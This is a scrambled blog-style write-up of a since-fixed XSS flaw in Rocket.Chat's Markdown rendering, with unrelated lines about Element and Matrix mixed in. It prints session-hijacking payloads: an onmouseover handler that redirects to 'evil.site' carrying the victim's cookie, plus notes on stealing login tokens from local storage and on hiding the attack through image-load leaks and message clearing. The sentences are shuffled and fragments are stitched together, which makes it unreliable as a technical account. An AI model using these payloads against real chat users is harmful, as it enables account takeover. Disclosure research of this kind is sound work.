![]() Different from other more common messengers, such as WhatsApp, Telegram or Signal, which are centralized, Element and Matrix are decentralized, like Session. The bug has been reported to Rocket.Chat’s security team and has been fixed in release 0.58.0.Element is a messaging app that is the reference client for the Matrix network. To make it even harder to detect, we could add JavaScript code that clears the message using method shown above. Now the attacker only needs to host Rocket.Chat logo on his server to be able to steal user sessions in an inconspicuous way. Fortunately, there is a well-known trick to solve this issue – we can use slash instead of space. There’s only one thing left – space character between The only noticeable side-effect of this method could be a short blink when new image is being loaded. This code will force browser to load data from external server with given URL, thus sending secret data to attacker. Session-stealing JS payload will look like this:ĭ='' InnerHTML of parent element and replace original image with our own. , we’d be able to steal session data without any visible changes. If we could replace it with the same image and leak data via URL eg. However, we can inspect DOM tree viaĪfter a short research we’ve found out that the last element of GetElementById since calling a function requires a closing parenthesis. It would be best if we could run external scripts, for example by simply adding Our next step is to make it harder to detect. We have an XSS that steals user’s session, but it’s extremely noticeable – redirection would instantly raise suspicions. By replacing those values in cookies and local storage, we can take control over victim’s account. This will send the necessary values to an attacker-controlled website. ! ( http : //onmouseover=window.location='http : //evil.site?cookie='+okie // ) This makes it possible to create a payload for session hijacking: ![]() Both are available in local storage as well as cookies that are not marked as HTTP Only. Taking a closer look at Rocket.Chat web application shows that user’s session is stored as two values: user id and login token. ! ( http : //onmouseover=window.location='http : //evil.site' // )Įverything works as expected – after moving mouse over the message we’re redirected to Onmouseover event and padding the message with random text so it would take as much space on a screen as possible. The best option we’ve found was triggering it with Onload attribute or any other event that would fire automatically. One last question is – how to trigger it? We can use single quote to put our string there and finish the whole line with ![]() Let’s try to create JavaScript payload that will redirect user to another location. double quote (“) and ampersand (&) characters are escaped to HTML entities ( aren’t)ĭespite those limitations, we’re still able to perform some nasty things.After a couple of tests we knew the following: Unfortunately, we are restricted by a few constraints. We know we can control the attribute name of Href attribute was for some reason converted to a HTML link, causing tag nesting. `foo` was not parsed as a code (it remains unchanged as a value of In the last example we can see weird things: Http : //bar" title ="`foo`" target ="_blank"> Let’s take a closer look at HTML rendered from examples above: It looked like some fault in parser, so we couldn’t wait to see if we can exploit it… Exploitation However, combining those two together results in a very strange output message – ! ( http : //url.to.image ), which will result in an image with specified title as an attribute of `code`, which will produce the following message: Among available options, there is inline code syntax – Rocket.Chat allows users to format their messages with Markdown syntax. Recently, we’ve observed a strange behavior of the chat service platform we’re using for everyday communication – Rocket.Chat.
0 Comments
Leave a Reply. |